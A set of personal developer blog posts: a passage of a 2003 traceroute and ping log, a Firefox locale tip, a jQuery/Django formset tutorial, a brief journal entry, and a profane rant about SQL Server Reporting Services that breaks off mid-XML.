5 20 ms 20 ms 21 ms so-4-0-0.xr1.lnd9.alter.net [172.16.31.10]<br>
6 * 20 ms 30 ms so-0-1-0.TR1.LND9.ALTER.NET [146.188.15.33]<br>
7 101 ms 100 ms 90 ms so-6-0-0.IR1.NYC12.ALTER.NET [146.188.15.50]<br>
8 100 ms 91 ms 100 ms 0.so-0-0-0.IL1.NYC9.ALTER.NET [192.168.3.11]<br>
9 100 ms 90 ms 90 ms 0.so-3-0-0.TL1.NYC9.ALTER.NET [192.168.3.116]<br>
10 90 ms 100 ms 100 ms 0.so-7-0-0.XL1.NYC4.ALTER.NET [172.16.31.10]<br>
11 101 ms 100 ms 90 ms POS7-1.IG3.NYC4.ALTER.NET [192.168.127.12]<br>
12 350 ms 361 ms 350 ms vsnlnetin-gw.customer.alter.net [172.16.17.32]<br>
13 350 ms * 351 ms LVSB-VSB-stm-3.Bbone.vsnl.net.in [192.168.3.11]<br>
14 350 ms 351 ms 360 ms 172.16.17.32<br>
15 * * * Request timed out.<br>
16 * * * Request timed out.<br>
17 * * * Request timed out.<br>
18 * * * Request timed out.<br>
19 * * * Request timed out.<br>
20 * * * Request timed out.<br>
21 * * * Request timed out.<br>
22 * * * Request timed out.<br>
23 * * * Request timed out.<br>
24 * * * Request timed out.<br>
25 * * * Request timed out.<br>
26 * * * Request timed out.<br>
27 * * * Request timed out.<br>
28 * * * Request timed out.<br>
29 * * * Request timed out.<br>
30 * * * Request timed out.</p>
<p>Trace complete.</p>
<p>C:\></p>
<p><b>6) Repeated pings to www.indiatimes.com</b></p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:03</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [192.168.127.12] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:03</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [172.16.17.3232] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:03</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [195.50.97.132] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:04</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [195.50.97.131] with 32 bytes of data:</p>
<p>Reply from 172.16.31.10: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:05</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [195.50.97.131] with 32 bytes of data:</p>
<p>Reply from 172.16.31.10: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:05</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [192.168.3.111] with 32 bytes of data:</p>
<p>Reply from 172.16.31.10: bytes=32 time=50ms TTL=55</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 50ms, Maximum = 50ms, Average = 50ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:05</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [172.16.31.10] with 32 bytes of data:</p>
<p>Request timed out.</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 0ms, Maximum = 0ms, Average = 0ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:07</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [80.15.238.69] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=56</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:10</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [172.16.17.32] with 32 bytes of data:</p>
<p>Reply from 172.16.17.32: bytes=32 time=50ms TTL=56</p>
<p>Ping statistics for 172.16.17.32:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 50ms, Maximum = 50ms, Average = 50ms</p>
<p>C:\></p>
<p>-end-</p>
<file_sep>---
layout: post
title: javascript dates in firefox and locales
date: '2016-09-27T07:31:00.002Z'
author: <NAME>
tags:
modified_time: '2016-09-28T07:44:06.085Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1701800026635188050
blogger_orig_url: https://timwise.blogspot.com/2016/09/javascript-dates-in-firefox-and-locales.html
---
Today I learnt:
You actually have to reinstall firefox using a different download to get `new
Date(dateString)` to use a different date format (i.e. non-US).
[https://jqueryvalidation.org/date-method/](https://jqueryvalidation.org/date-method/)
> This method should not be used, since it relies on the `new Date`
> constructor, which behaves very differently across browsers and locales. Use
> `dateISO` instead or one of the locale specific methods (in localizations/
> and additional-methods.js).
So if you're using chocolatey or boxstarter like I am ([my boxstarter
script](https://gist.github.com/timabell/608fb680bfc920f372ac)) you need to add
the locale flag:
[https://chocolatey.org/packages/firefox](https://chocolatey.org/packages/firefox)
`choco install Firefox -packageParameters "l=en-GB"`.
Reinstalling the package with `--force` is sufficient to change it.
It would seem chrome has no way to change the format from `en-US`.
To be clear the correct solution is to do as the documentation says and not use
that method, however it's a bit mean having a pitfall like that in the API. And
sometimes you just have to work with the code you have...
<file_sep>---
layout: post
title: Auto-expanding django formset with jQuery
date: '2011-07-07T23:02:00.009Z'
author: <NAME>
tags:
- howto
- dhtml
- django
- code
- jQuery
modified_time: '2011-07-08T23:00:55.354Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1390054549969590161
blogger_orig_url: https://timwise.blogspot.com/2011/07/auto-expanding-django-formset-with.html
---
As it took me quite a while to get it how I like it, here's the relevant bits for making a django formset (custom markup in a table), that automatically adds rows (formset forms) client-side / in the browser keeping up as you fill in the form.
Do with the code as you wish, no licence needed.
In the view (.html file server side) I have:
@login_required
def invoiceEdit(request, invoice_id):
...
InlineInvoiceItemsFormSet = inlineformset_factory(Invoice, InvoiceItem, form=DeleteIfEmptyModelForm, formset=DeleteIfEmptyInlineFormSet, can_delete=True, extra=10)
...
itemFormSet = InlineInvoiceItemsFormSet()
...
return render_to_response('foo/edit.html', {'invoiceForm': invoiceForm, 'itemFormSet': itemFormSet, 'invoice': invoice}, context_instance=RequestContext(request))
In the template I have:
<script type="text/javascript">
// Initialise the auto-expanding formset once the DOM is ready.
$(document).ready(function () {
  setupInvoiceFormset();
});
// Number of forms the server rendered initially; set in setupInvoiceFormset()
// and used later to avoid trimming away real (saved) rows.
var initialRows;

// Wire up the auto-expanding formset: trim surplus blank rows straight away,
// then re-check the row count whenever any input in a row loses focus.
function setupInvoiceFormset() {
  // Radix 10 guards against legacy engines parsing leading-zero values as octal.
  initialRows = parseInt($('#id_invoiceitem_set-INITIAL_FORMS').val(), 10);
  // remove all but last two empty rows
  resizeInvoiceFormset();
  // add handlers to all inputs to automate row adding
  $('.invoiceItemRow :input').blur(resizeInvoiceFormset);
}
const targetExtra = 2; // number of trailing blank rows to keep available

// Grow or shrink the formset so there are always exactly `targetExtra` blank
// rows after the last filled one, then sync django's hidden TOTAL_FORMS
// management field to match.
function resizeInvoiceFormset() {
  // All live rows, excluding the hidden template row used for cloning.
  var rows = $('.invoiceItemRow').filter(':not(#templateItemRow)');
  var totalRows = rows.length;
  var blankRows = countBlankRows(rows);
  var targetRowCount = totalRows - blankRows + targetExtra;
  // Never drop below the server-rendered count, otherwise delete breaks.
  targetRowCount = Math.max(targetRowCount, initialRows);
  if (totalRows > targetRowCount) {
    // Too many blank rows: remove the surplus rows from the end
    // (slice(n) keeps indexes 0..n-1 and selects the rest for removal).
    rows.slice(targetRowCount).remove();
  } else if (totalRows < targetRowCount) {
    // Too few: append blank rows until we reach the target count.
    for (var newRowIndex = totalRows; newRowIndex < targetRowCount; newRowIndex++) {
      addRow(newRowIndex);
    }
  } else {
    return; // already the right size; leave TOTAL_FORMS untouched
  }
  // Tell django's formset machinery how many forms the page now holds.
  $('#id_invoiceitem_set-TOTAL_FORMS').val(targetRowCount);
}
// Count the consecutive blank rows at the end of the formset, scanning
// upwards from the last row and stopping at the first filled one.
function countBlankRows(rows) {
  var blank = 0;
  var remaining = rows.length;
  while (remaining > 0 && isEmptyRow(rows[remaining - 1])) {
    blank++;
    remaining--;
  }
  return blank;
}
// True when every visible input in the row contains nothing but whitespace.
function isEmptyRow(row) {
  var visibleInputs = $(row).find(':input').filter(':not(:hidden)');
  var allBlank = true;
  visibleInputs.each(function () {
    if ($.trim(this.value).length) {
      allBlank = false;
      return false; // break out of .each() at the first filled input
    }
  });
  return allBlank;
}
// Clone the hidden template row, substitute the real form index into the
// cloned inputs' name/id attributes, and append it after the last row.
function addRow(newRowIndex) {
  var row = $('#templateItemRow').clone(true);
  row.addClass('invoiceItemRow');
  row.removeAttr('id'); // the template's id must not be duplicated
  row.show();
  // Django's empty_form uses '__prefix__' as a placeholder for the form index.
  row.find(':input').each(function () {
    var input = $(this);
    input.attr('name', input.attr('name').replace('__prefix__', newRowIndex));
    input.attr('id', input.attr('id').replace('__prefix__', newRowIndex));
  });
  $('.invoiceItemRow:last').after(row);
}
</script>
...
{# Hidden fields Django needs to track form counts (TOTAL_FORMS etc.). #}
{{ itemFormSet.management_form }}
{# Hidden template row: cloned by addRow(), which replaces '__prefix__' in its input names/ids with the real form index. #}
<tr id="templateItemRow" class="invoiceItemRow" style="display: none;">
<td><strong>Item:</strong></td>
<td>
{{ itemFormSet.empty_form.id }}
{{ itemFormSet.empty_form.description }}
{{ itemFormSet.empty_form.description.errors }}</td>
<td class="price">£{{ itemFormSet.empty_form.price }} {{ itemFormSet.empty_form.price.errors }}</td></tr>
{# Server-rendered rows for existing invoice items. #}
{% for item in itemFormSet.forms %}
<tr class="invoiceItemRow">
<td><strong>Item:</strong></td>
<td>
{{ item.id }}
{{ item.description }}
{{ item.description.errors }}</td>
<td class="price">£{{ item.price }} {{ item.price.errors }}</td></tr>
{% endfor %}
...
The result is a form that intuitively shrinks/grows as the content is added/removed.
The javascript is of course actually in a separate .js file.
References:
* [https://docs.djangoproject.com/en/dev/topics/forms/formsets/](https://docs.djangoproject.com/en/dev/topics/forms/formsets/)
* [http://api.jquery.com/](http://api.jquery.com/)
Footnote. You may have noticed the delete-if-empty customisation which I like for usability. References for this at
* [http://pastebin.com/f40a3bde9](http://pastebin.com/f40a3bde9)
* [http://groups.google.com/group/django-users/browse_thread/thread/9e26cf3ab1d1fcb1?tvc=2](http://groups.google.com/group/django-users/browse_thread/thread/9e26cf3ab1d1fcb1?tvc=2)
* [http://groups.google.com/group/django-users/browse_thread/thread/23539f5e085e62b0](http://groups.google.com/group/django-users/browse_thread/thread/23539f5e085e62b0)
<file_sep>---
title: "an evenings work"
date: 2004-07-27
slashdot_url: https://slashdot.org/journal/78638/an-evenings-work
---
<p>late in from work<br>bolognese from scratch<br>guitar<br>sleep<br>happiness</p>
<file_sep>---
layout: post
title: 100 reasons I hate ssrs
date: '2015-08-12T19:01:00.004Z'
author: <NAME>
tags:
modified_time: '2016-11-15T11:49:21.321Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-875301386032121102
blogger_orig_url: https://timwise.blogspot.com/2015/08/100-reasons-i-hate-ssrs.html
---
*Originally posted at <https://timwise.blogspot.com/2015/08/100-reasons-i-hate-ssrs.html> which attracted some great comments.*
A slightly tongue-in cheek hit-list of nasty things and vague hand-waving
opinions on what makes microsoft's sql server reporting services (ssrs) such a
pig to work with.
I don't really know of anything better so this is mostly just pointless
ranting; but I'll justify it to myself by saying at least you'll know what
you're getting into if you've read this before you start. SSRS seems to be more
"death by one thousand paper cuts" than completely broken, so it's not so easy
to say "it's shit, shalln't use it" like any good prima-donna developer would.
Sorry I mean rock-star (recruiter speak). It also offers a few features that
would be pretty hard to code from hand cost-effectively in something like
asp.net mvc, such as user editing, multiple export formats, scheduled emails,
and some of the ways you can cut-and-shut the data in the reports.
I make no apologies for the colourful language, it's a representation of the
emotional side of having to use this heap of crap.
Some of these were contributed by in the comments (on blogger) after I posted
the original article. (Thanks, that was a nice surprise, and it's nice to know
it's not just me!)
1. [http://www.allenkinsel.com/archive/2013/01/adventures-in-ssrs](http://www.allenkinsel.com/archive/2013/01/adventures-in-ssrs)
1. doesn't bind to a port like a normal fukcing service
1. [http://blogs.devhorizon.com/reza/2008/10/20/say-goodbye-to-iis-say-hello-to-httpsys/](http://blogs.devhorizon.com/reza/2008/10/20/say-goodbye-to-iis-say-hello-to-httpsys/)
1. [http://www.iis.net/learn/get-started/introduction-to-iis/introduction-to-iis-architecture#Hypertext](http://www.iis.net/learn/get-started/introduction-to-iis/introduction-to-iis-architecture#Hypertext)
1. [https://social.technet.microsoft.com/Forums/sqlserver/en-US/f2586aca-78fe-40d6-9bcd-5151bac7136f/role-of-httpsys-in-ssrs-2008-?forum=sqlreportingservices](https://social.technet.microsoft.com/Forums/sqlserver/en-US/f2586aca-78fe-40d6-9bcd-5151bac7136f/role-of-httpsys-in-ssrs-2008-?forum=sqlreportingservices)
1. [http://blogs.technet.com/b/andrew/archive/2007/12/04/sql-server-2008-reporting-services-no-longer-depends-on-iis.aspx](http://blogs.technet.com/b/andrew/archive/2007/12/04/sql-server-2008-reporting-services-no-longer-depends-on-iis.aspx)
1. http server api (aka http.sys)
1. [https://msdn.microsoft.com/en-us/library/aa364510%28VS.85%29.aspx?f=255&MSPPError=-2147217396](https://msdn.microsoft.com/en-us/library/aa364510%28VS.85%29.aspx?f=255&MSPPError=-2147217396)
1. list reservations:
1. `netsh http show urlacl`
1. auth in reporting [https://msdn.microsoft.com/en-us/library/ms152899.aspx](https://msdn.microsoft.com/en-us/library/ms152899.aspx)
1. reports in VS
1. [http://curah.microsoft.com/22200/create-ssrs-reports-using-visual-studio](http://curah.microsoft.com/22200/create-ssrs-reports-using-visual-studio)
1. [https://msdn.microsoft.com/en-us/library/ms173745.aspx](https://msdn.microsoft.com/en-us/library/ms173745.aspx)
1. "Explicity add new role assingment for the account you are using and check every box in sight" ~ a.n. colleague. lol
1. ignore the .rdl.data files with git.
1. [http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation#3425429](http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation#3425429)
1. no folders.
1. [https://connect.microsoft.com/SQLServer/feedback/details/487106/allow-sub-folders-in-ssrs-projects](https://connect.microsoft.com/SQLServer/feedback/details/487106/allow-sub-folders-in-ssrs-projects)
1. [http://stackoverflow.com/questions/3309002/visual-studio-for-ssrs-2008-how-to-organize-reports-into-subfolders-in-solutio](http://stackoverflow.com/questions/3309002/visual-studio-for-ssrs-2008-how-to-organize-reports-into-subfolders-in-solutio)
1. renamed a dataset, nothing fucking broke!!!!!!!!!!!!!!!!!!!!!!!!!!! even though there are reports that depend on it. On editing the report's dataset list you can see clearly "not found", but yet it still runs. what in the blazes is that all about?
1. caching in the report editor [http://stackoverflow.com/q/3424928/10245](http://stackoverflow.com/q/3424928/10245)
1. kill the .data cache files [http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation](http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation)
1. git clean -xfd
1. fuck
1. [https://social.msdn.microsoft.com/Forums/sqlserver/en-US/0aa81692-352f-4c1f-a0e3-95fe6c0797ca/cachedataforpreview-in-rsreportdesignerconfig-not-honored](https://social.msdn.microsoft.com/Forums/sqlserver/en-US/0aa81692-352f-4c1f-a0e3-95fe6c0797ca/cachedataforpreview-in-rsreportdesignerconfig-not-honored)
1. [https://connect.microsoft.com/SQLServer/feedback/details/468482](https://connect.microsoft.com/SQLServer/feedback/details/468482)
1. it's the `bin\` folder, not the .data files. Still, fuckkkk.
1. to get from a report to a db you go, report > report dataset > shared dataset > db, but db is defined in the shared dataset with another name, which can be pointed to a shared data source, which is also named. and *that* data source actually has a connection string
1. committing to tfs failed half way through because vs had locked a bunch of files I didn't even have open
1. found a param with `<Value>=Microsoft.VisualBasic.Strings.Join(Parameters!Stages.Label, ", ")</Value>` - wtf.
1. function overload matching warning wouldn't go away till I closed the sln
1. localisation is a bitch
1. [http://stackoverflow.com/questions/10953629/how-to-change-ssrs-2008-locale](http://stackoverflow.com/questions/10953629/how-to-change-ssrs-2008-locale) etc
1. [http://blog.ponytailbob.com/2007/10/multi-language-tips-in-ssrs.html](http://blog.ponytailbob.com/2007/10/multi-language-tips-in-ssrs.html)
1. [http://blogs.msdn.com/b/sriram_reddy1/archive/2012/01/09/localization-in-ssrs-reports.aspx](http://blogs.msdn.com/b/sriram_reddy1/archive/2012/01/09/localization-in-ssrs-reports.aspx)
1. [https://support.microsoft.com/en-gb/kb/919153](https://support.microsoft.com/en-gb/kb/919153)
1. [http://www.keepitsimpleandfast.com/2011/09/localization-of-your-ssrs-reports.html](http://www.keepitsimpleandfast.com/2011/09/localization-of-your-ssrs-reports.html)
1. why you no use User!Language??
1. Visual Studio 2013 crashed. hard. while cancelling new report param
1. adds 00:00:00 to date fields from sql server. duuuuuuuuuuuuh (goes via .net datetime internally, but even so, not friendly)
1. changed date format, looks fine in VS, but no change in report server. wuh? deploy all
1. no auto-sizing of cols [http://stackoverflow.com/questions/7851045/ssrs-tablix-column-cangrow-property-for-width](http://stackoverflow.com/questions/7851045/ssrs-tablix-column-cangrow-property-for-width)
1. no nulls in multi-value [http://www.keepitsimpleandfast.com/2012/03/how-to-pass-null-value-to-multi-value.html](http://www.keepitsimpleandfast.com/2012/03/how-to-pass-null-value-to-multi-value.html)
1. need dirty hack to show "all" rather than full list
1. [http://www.mssqltips.com/sqlservertip/2844/working-with-multiselect-parameters-for-ssrs-reports/](http://www.mssqltips.com/sqlservertip/2844/working-with-multiselect-parameters-for-ssrs-reports/)
1. [http://stackoverflow.com/questions/12917261/optional-multi-valued-parameters-in-ssrs](http://stackoverflow.com/questions/12917261/optional-multi-valued-parameters-in-ssrs)
1. [http://www.bi-rootdata.com/2012/09/efficient-way-of-using-all-as-parameter.html](http://www.bi-rootdata.com/2012/09/efficient-way-of-using-all-as-parameter.html)
1. [http://blog.ponytailbob.com/2007/10/2-shortcomings-of-multi-valued.html](http://blog.ponytailbob.com/2007/10/2-shortcomings-of-multi-valued.html)
1. some fucking horror I've yet to encounter (querystrings) [http://stackoverflow.com/questions/512105/passing-multiple-values-for-a-single-parameter-in-reporting-services](http://stackoverflow.com/questions/512105/passing-multiple-values-for-a-single-parameter-in-reporting-services)
1. it has a fucking canvas size that will push over to 2 pages
1. the font kerning on a print is massively different to on web / design view
1. sorting
1. [http://stackoverflow.com/questions/9254604/why-does-my-sql-server-reporting-service-ssrs-report-appear-to-re-sort-the-d](http://stackoverflow.com/questions/9254604/why-does-my-sql-server-reporting-service-ssrs-report-appear-to-re-sort-the-d)
1. "Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: index " from editing xml. thanks for the error info. fuckkkkkers
1. the ssrs gui editor is a flaky piece of shit
1. doesn't select the right fucking textbox in the props window
1. had to restart visual fuckigjn studio
1. grrr
1. the underlying xml is fucking horrific
1. `<rd:Selected>true</rd:Selected>` ----- what in the fucking blazes is that doing in there?
1. how do you deploy without connecting visual studio to production server? you fucking don't hahahahahaa
1. powerhell [https://gist.github.com/timabell/7e3019bd2de802f0b259](https://gist.github.com/timabell/7e3019bd2de802f0b259)
1. ssbi install croaked - [https://support.microsoft.com/en-us/kb/2800050?wa=wsignin1.0](https://support.microsoft.com/en-us/kb/2800050?wa=wsignin1.0)
1. [09:44:53] john doe: Tim can I have a `.bak` file of `ReportServer$MSSQL2012TempDB` which the stupid software seems to be unable to operate without even though it has **Temp** in the database name implying it will rebuild itself (at least that's what it implies to me)
1. [09:47:48] Tim Abell: (facepalm)
1. [09:47:49] Tim Abell: sure
1. [09:48:08] Tim Abell: I did wonder, and then I thought, no they couldn't possibly need that
1. dropdown doesn't work in firefox
1. no debugging [http://stackoverflow.com/a/14068447/10245](http://stackoverflow.com/a/14068447/10245)
1. Warning : The text box ‘appliedFilters’ and the image ‘urLogo’ overlap. Overlapping report items are not supported in all renderers.
1. the only options for DRY in reports suck balls [http://www.3pillarglobal.com/insights/tips-tricks-ensure-consistency-sql-server-reporting-services-reports](http://www.3pillarglobal.com/insights/tips-tricks-ensure-consistency-sql-server-reporting-services-reports)
1. [http://harmful.cat-v.org/software/xml/](http://harmful.cat-v.org/software/xml/) xml is a terrible format anyway
1. layout is in inches
1. you can change the layout to cm
1. it stores different metrics (cm/in) for each element, wtf, pick a unit
1. reflowing nicely is impossible
1. layout engine is as intelligent as a piece of paper and a pen. x,y is all you get.
1. [http://www.webapplicationsuk.com/2010/07/word-html-renderer-ndash-the-road-to-hellhellip/](http://www.webapplicationsuk.com/2010/07/word-html-renderer-ndash-the-road-to-hellhellip/)
1. [https://connect.microsoft.com/SQLServer/feedback/details/540183/supported-rdl-object-model-rdlom](https://connect.microsoft.com/SQLServer/feedback/details/540183/supported-rdl-object-model-rdlom)
1. this is the kind of bullshit that counts for helpful content on the net [https://social.msdn.microsoft.com/Forums/en-US/86205ca4-13d0-4ca6-84f1-79797616f0f4/exclude-null-values-from-sum-and-avg-calculation?forum=sqlreportingservices](https://social.msdn.microsoft.com/Forums/en-US/86205ca4-13d0-4ca6-84f1-79797616f0f4/exclude-null-values-from-sum-and-avg-calculation?forum=sqlreportingservices) - `=sum(forum_format * quality_of_community)` = errorrrrrrrrr
1. multiple rdl xml schema in the same fucking project, completely different xml structure
1. 2005 generated with "new report wizard" in VS 20-fucking-13: `<Report xmlns="http://schemas.microsoft.com/sqlserver/reporting/2005/01/reportdefinition" xmlns:rd="http://schemas.microsoft.com/SQLServer/reporting/reportdesigner">`
1. 2008 `<Report xmlns="http://schemas.microsoft.com/sqlserver/reporting/2008/01/reportdefinition" xmlns:rd="http://schemas.microsoft.com/SQLServer/reporting/reportdesigner">`
1. 2009 from <https://technet.microsoft.com/en-us/library/cc627465%28v=sql.105%29.aspx> - `<Report xmlns:rd=http://schemas.microsoft.com/SQLServer/reporting/reportdesigner xmlns="http://schemas.microsoft.com/sqlserver/reporting/2009/01/reportdefinition">`
1. 2010 `<Report xmlns:rd="http://schemas.microsoft.com/SQLServer/reporting/reportdesigner" xmlns:cl="http://schemas.microsoft.com/sqlserver/reporting/2010/01/componentdefinition" xmlns="http://schemas.microsoft.com/sqlserver/reporting/2010/01/reportdefinition">`
1. how many fucking versions??!
1. [http://stackoverflow.com/questions/15539859/what-is-the-difference-between-rdl-2008-schema-and-rdl-2010-schema-feature-wise](http://stackoverflow.com/questions/15539859/what-is-the-difference-between-rdl-2008-schema-and-rdl-2010-schema-feature-wise)
1. [http://stackoverflow.com/questions/9974179/is-there-a-new-version-of-rdl-schema-for-sql-server-2012-denali](http://stackoverflow.com/questions/9974179/is-there-a-new-version-of-rdl-schema-for-sql-server-2012-denali)
1. [http://stackoverflow.com/questions/29951653/ssrs-2008r2-visual-studio-2008-and-2008-and-2010-schemas](http://stackoverflow.com/questions/29951653/ssrs-2008r2-visual-studio-2008-and-2008-and-2010-schemas) - how to not end up with old schema?!
1. [https://social.msdn.microsoft.com/Forums/sqlserver/en-US/f4d14548-c592-4d8d-8185-ca683c421649/2010-schema-with-visual-studio-2010?forum=sqlreportingservices](https://social.msdn.microsoft.com/Forums/sqlserver/en-US/f4d14548-c592-4d8d-8185-ca683c421649/2010-schema-with-visual-studio-2010?forum=sqlreportingservices)
1. how do you upgrade a report schema? install a massive chunk of fucking sql server [http://stackoverflow.com/questions/13170608/upgrade-my-rdlc-schema-from-2008-01-to-2010-01](http://stackoverflow.com/questions/13170608/upgrade-my-rdlc-schema-from-2008-01-to-2010-01)
1. [17:54:48] john doe: Btw have you noticed that in Print Layout view the header doesn't expand if any of the textboxes have auto-grown?
[17:55:14] <NAME>ell: that's because ssrs is a piece of shit from 1990
[17:55:28] <NAME>: and it thinks A4 is the ultimate display format
[17:55:47] <NAME>: you just have to guess how much space you'll need
1. the ordering of the xml in the proj file is unstable causing diff noise
1. subreports, icky [http://bhushan.extreme-advice.com/subreport-in-ssrs/](http://bhushan.extreme-advice.com/subreport-in-ssrs/)
1. or nested tables [http://stackoverflow.com/questions/11335655/filtering-nested-data-regions-in-ssrs](http://stackoverflow.com/questions/11335655/filtering-nested-data-regions-in-ssrs)
1. some things can only be achieved with subreports, and they have to be deployed separately from the main report, meaning they can get out of sync. enjoy the fear of not knowing if you'll break something else when you upload your new version of the subreport you depend on
1. no support for "time" data type [http://stackoverflow.com/questions/3846378/displaying-time-in-reporting-services-2008](http://stackoverflow.com/questions/3846378/displaying-time-in-reporting-services-2008)
1. The "View Report" button next to the parameters when running a report in VS is *always* greyed-out, even though it actually works.
1. wow that's mental, hidden reports show in details view and not in tile view in the ssrs web ui
1. the report editor has a copy option for report items, but no paste, so you can't duplicate reports
1. actually you can, but only if you know the keyboard shortcuts. 0_o - ctrl-c ctrl-v
1. duplicating a report on the filesystem, and then using "add existing item" to include it puts it at the end of the list... until you rename it and then it's moved into alphabetical order causing a spurious diff. should have put in the right place in the first place. grr.
1. using the cursor keys to move textboxes around is so laggy that I overshoot every single time
1. the editor popups in visual studio are modal, so you can't refer to anything else
1. and there's no maximise button so you have to drag the fiddly border to make it bigger
1. the report editor hasn't heard of ctrl-c or ctrl-v, have to use ctrl-Ins / shift-Ins instead
1. border rendering / precedence is a fucking mess. set some borders, your report will look like a two-year-old coloured it in, and how it looks changes depending on the zoom level.
1. you have to use VB to do alternate row colours - [http://stackoverflow.com/questions/44376/add-alternating-row-color-to-sql-server-reporting-services-report](http://stackoverflow.com/questions/44376/add-alternating-row-color-to-sql-server-reporting-services-report)
1. if anything goes wrong with an expression all you get is "#Error". Helpful. E.g. [http://stackoverflow.com/q/9144312/10245](http://stackoverflow.com/q/9144312/10245)
1. this one time, at band camp, I edited a report definition in VS and it refused to save the new definition to disk (ctrl-shift-s, ctrl-shift-s!!). wtf. Restarted VS and all the changes were gone.
1. report editor silently adds new parameters to the report when you add new parameters to the sql. seriously. fuck off.
1. RSI-inducing UI for editing the reports. click click click clickity click
1. the sql editor has only a single undo. like ye olde notepad.
1. in the editor, you can right-click copy, you can't right-click paste. wtf. ctrl-v does paste though. wtf again. I know, I already said it, but it's reaaaaaly shit
1. the field list on a dataset is ordinal, allowing you to mismatch the select in the sql from the list of fields in the dataset and not notice
1. how do you align a textbox on the page?
```xml
<Top>0.82546cm</Top>
<Left>0.07309cm</Left>
<Height>0.88964cm</Height>
<Width>2.3025cm</Width>
```
fuck you!!!!
1. one goddam cell in the underlying format:
```xml
<TablixCell>
<CellContents>
<Textbox Name="qty">
<CanGrow>true</CanGrow>
<KeepTogether>true</KeepTogether>
<Paragraphs>
<Paragraph>
<TextRuns>
<TextRun>
<Value>=Sum(Fields!qty.Value)</Value>
<Style />
</TextRun>
</TextRuns>
<Style />
</Paragraph>
</Paragraphs>
<rd:DefaultName>qty</rd:DefaultName>
<Style>
<Border>
<Color>LightGrey</Color>
<Style>None</Style>
</Border>
<PaddingLeft>2pt</PaddingLeft>
<PaddingRight>2pt</PaddingRight>
